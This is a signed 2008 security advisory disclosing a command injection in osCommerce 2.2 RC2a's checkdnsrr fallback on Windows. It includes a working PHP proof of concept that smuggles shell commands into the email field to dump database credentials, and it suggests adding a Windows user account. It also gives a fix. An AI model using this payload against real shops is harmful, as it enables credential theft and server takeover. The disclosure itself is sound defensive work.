-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nearly arbitrary, remote code execution in osCommerce 2.2 RC2a on Windows with
DNS e-mail verification enabled

Application: osCommerce Online Merchant 2.2 RC2a
CVE: ?
Severity: Moderate
Released: ?
Last modified: 28 XI 2008



Overview

osCommerce Online Merchant is one of the most popular e-commerce solutions; it
is a quick and simple way to setup a virtual shop.

osCommerce can be configured to check if a domain of an e-mail address exists,
using a DNS lookup. This verification is disabled on default, but can be enabled
through the administration panel:

Configuration-->E-mail Options-->Verify E-mail addresses through DNS.

Verification can be triggered in any place the system is sending mail. This
verification is performed using the PHP checkdnsrr function. For
environments on which such function is not available one is provided in
compatibility.php file. Checkdnsrr function is not available on Windows PHP
setups and possibly with some other environments (PHP3?, blocked by provider?).

The compatibility version of the checkdnsrr function takes domain name to check
for and, failing to escape it for shell execution, appends it to a call to
nslookup. In some places the domain name comes from the user and even though it
is "validated" using a regular expression (see: functions/validations.php), it
is possible to inject code that will get executed on the host.

Setting or unsetting PHP directives such as register_globals or magic_quotes_gpc
does not help with this problem.



Proof of concept

1. Install a fresh copy of osCommerce 2.2 RC2a on Windows (eg. using WAMP).
2. Enable e-mail verification.
3. Execute the following script (cURL extension required):

<?php

$a = 'http://www.example.com/catalog/contact_us.php?action=send';
$p = array();
$p['name'] = 'a';
$p['enquiry'] = 'a';
$p['email'] = "aaa@example.com&copy\tincludes\tt.txt&.aa";

$c = curl_init();
curl_setopt($c, CURLOPT_URL, $a);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, $p);
curl_exec($c);
curl_close($c);

4. Check that the copy command worked by browsing to:

http://www.example.com/catalog/t.txt .

The file should contain contents of all files in the includes directory,
together with the database credentials.

You can change the command ("copy includes t.txt" above) with something else,
like "net user aaa aaa /add", it will get exec'ed, so depending on server's
permissions different things are possible. You have to avoid characters
disallowed by the domain validation, namely: space and []()<>@,;:.\". Replacing
spaces with tabs works on Windows, "&" serves to separate multiple commands.



Recommendation

If you are hosted on Linux or you have e-mail verification disabled most
probably you do not have to worry. If there is no checkdnsrr in your environment
as a quick fix you can simply disable the verification.

Arguments should be escaped in the checkdnsrr compatibility function, for
example using the escapeshellarg function.



PGP-Key

http://www.wrwrwr.org/public-pgp-key

pub 1024D/D33EE52B 2007-09-17
fingerprint 5FEA 4CB2 0866 698A 187D F2AA 7CE9 A5A6 D33E E52B



Copyright 2008 Wojtek Ruszczewski <security@wrwrwr.org>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJNBXNfOmlptM+5SsRAg8oAJ9+vvRr0DxIzDiMT4VzioPZxtipxACfejpH
doXPUgDeKSdY3eFkNiQqWlo=
=7ptO
-----END PGP SIGNATURE-----